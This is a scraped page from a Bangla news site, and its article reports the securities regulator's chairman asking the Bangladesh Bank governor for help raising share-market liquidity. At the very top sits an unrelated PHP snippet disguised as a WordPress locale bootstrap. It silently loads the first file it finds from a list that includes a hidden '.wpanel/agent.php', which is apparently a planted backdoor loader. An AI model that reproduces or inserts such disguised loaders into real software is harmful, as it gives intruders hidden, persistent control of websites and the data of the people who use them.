// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } শেয়ারবাজারে তারল্য বাড়াতে বাংলাদেশ ব্যাংকের সহযোগিতা চেয়েছেন বিএসইসি - www.htbanglatv.com শেয়ারবাজারে তারল্য বাড়াতে বাংলাদেশ ব্যাংকের সহযোগিতা চেয়েছেন বিএসইসি - www.htbanglatv.com
শিরোনাম
তালায় মাদকের তথ্য দেওয়ায় গ্রাম পুলিশকে পেটাল মাদক কারবারিরা, জিডি চন্দনাইশে খুনিয়া পাড়া ইয়াং সোসাইটির অলিম্পিক ফুটবল টুর্নামেন্টের উদ্বোধন  পোরশায় মাদকবিরোধী অভিযানে ০১ জন পেশাদার খুচরা মাদক ব্যবসায়ী গ্রেফতার-২৫০ গ্রাম গাঁজা জব্দ।  ইন্দোরে শুরু হলো ১৮তম ভারতীয় সাংবাদিকতা উৎসব ২০২৬: মূল ভাবনা ‘জেন-জি’, সম্মানিত সংবাদমাধ্যমের কিংবদন্তিরা। পোরশায় আদিবাসী সমাবেশ ও ত্রি-বার্ষিক সমাবেশ ২০২৬ অনুষ্ঠিত।     নীলফামারীতে বিজিবির অভিযানে ১৮ পিস ইয়াবাসহ শীর্ষ মাদক ব্যবসায়ী আটক শিক্ষার গুণগত মানোন্নয়নের লক্ষে নিতপুর দারুস সুন্নাহ সিনিয়র ফাজিল মাদ্রাসায় এক মা সমাবেশ ২০২৬ অনুষ্ঠিত।  হাজরাকাটি ব্লাড ডোনার্স ক্লাবের ১ম প্রতিষ্ঠাবার্ষিকীতে বিনামূল্যে রক্তের গ্রুপ নির্ণয় ও আলোচনা সভা পোরশা উপজেলায় নতুন গাইনী ডাক্তারের যোগদান , রোগীদের পাশে থাকার অঙ্গীকার লালমনিরহাট ও ডিমলায় বিজিবির অভিযানে ১৭ লাখ টাকার চুইঝাল ও কাঠ জব্দ
বুধবার, ০৭ অক্টোবর ২০২৬, ১০:১০ পূর্বাহ্ন

শেয়ারবাজারে তারল্য বাড়াতে বাংলাদেশ ব্যাংকের সহযোগিতা চেয়েছেন বিএসইসি

রিপোটারের নাম / ৮১১ বার পড়া হয়েছে
প্রকাশের সময় : বুধবার, ৩ জানুয়ারি, ২০২৪

এইচটি বাংলা ডেস্ক:  দেশের শেয়ারবাজারে তারল্য বাড়াতে ব্যাংকগুলো কীভাবে অবদান রাখতে পারে সে বিষয়ে বাংলাদেশ ব্যাংকের গভর্নরের সহযোগিতা চেয়েছেন বাংলাদেশ সিকিউরিটিজ অ্যান্ড এক্সচেঞ্জ কমিশনের (বিএসইসি) চেয়ারম্যান অধ্যাপক শিবলী রুবাইয়াত-উল-ইসলাম।

বুধবার (৩ জানুয়ারি) বাংলাদেশ ব্যাংকে দুই নিয়ন্ত্রক সংস্থার প্রধানদের নতুন বছরের শুভেচ্ছা বিনিময়কালে তিনি এ কথা বলেন।

বৈঠকে শেয়ারবাজারের তারল্য বৃদ্ধি ও দেশের অর্থনীতির সার্বিক বিষয়ে আলোচনা হয়েছে। এ সময়ে তারা নির্বাচন পরবর্তী আর্থিক খাতের সার্বিক অবস্থা নিয়ে আলোচনা করেন।

এ বিষয়ে বিএসইসির মুখপাত্র মোহাম্মদ রেজাউল করিম বলেন, আজকে বাংলাদেশ ব্যাংকের গভর্নর ও বিএসইসি চেয়ারম্যানের মধ্যে নতুন বছরের শুভেচ্ছা বিনিময় হয়েছে। বৈঠকে দেশের অর্থনীতি ও পুঁজিবাজারের বর্তমান পরিস্থিতি নিয়ে আলোচনা হয়েছে। এ সময়ে শেয়ারবাজারে তারল্য বাড়াতে ব্যাংকগুলোকে আইনের মধ্যে থেকে আরও সক্রিয় হওয়ার জন্য গভর্নরের কাছে আহ্বান জানান।

তিনি বলেন, নির্বাচন পরবর্তীতে শেয়ারবাজার কোন ধরণের তারল্য সংকটে না পড়ে এবং শেয়ারবাজারের উন্নয়নে বাংলাদেশ ব্যাংকের গভর্নর পাশে থাকার আশ্বাস দিয়েছেন।


এই ক্যাটাগরির আরো সংবাদ

;